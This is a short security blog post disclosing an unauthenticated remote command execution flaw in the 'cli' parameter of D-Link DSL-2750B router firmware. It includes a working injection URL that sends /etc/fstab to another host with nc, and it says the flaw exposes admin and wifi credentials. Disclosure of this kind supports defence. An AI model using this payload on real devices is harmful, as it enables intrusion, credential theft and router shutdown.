D-Link router DSL-2750B firmware 1.01 to 1.03 – RCE no auth
After playing around a bit with my home router, I’ve noticed something interesting during login phase; user is redirected on error page by providing wrong credentials and the URL catch my eye:
In order to see what’s happening, web server must be started on the router with the debug output enabled:
Seems like arguments of “cli” parameter are the input of a binary that will execute that particular given command; the complete list of commands available are listed inside “/etc/ayecli/ayecli.cli” file on the router. (among them there’s a creepy “system halt” that will shutdown the router no matter what).
Arguments are used in this way:
ayecli -c ‘command-here’
To execute remote arbitrary commands we must append ‘ , adding the command and another ‘ , in order to neutralize the substitution that is made with “$” with ‘ at the very end of the URL:
ayecli -c ‘command’;injection”
http://192.168.1.1/login.cli?cli=hwget wpassphrase_2.4G’;nc 192.168.1.8 666 </etc/fstab’$
By exploiting this bug, is it possible to retrieve also cleartext admin password, wifi passphrase and so on.
Latest posts by admin (see all)
- IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability - 6 February 2018
- D-Link router DSL-2750B firmware 1.01 to 1.03 – RCE no auth - 21 January 2017
- “Skimmer 2.0” at MOCA 2016 - 21 January 2017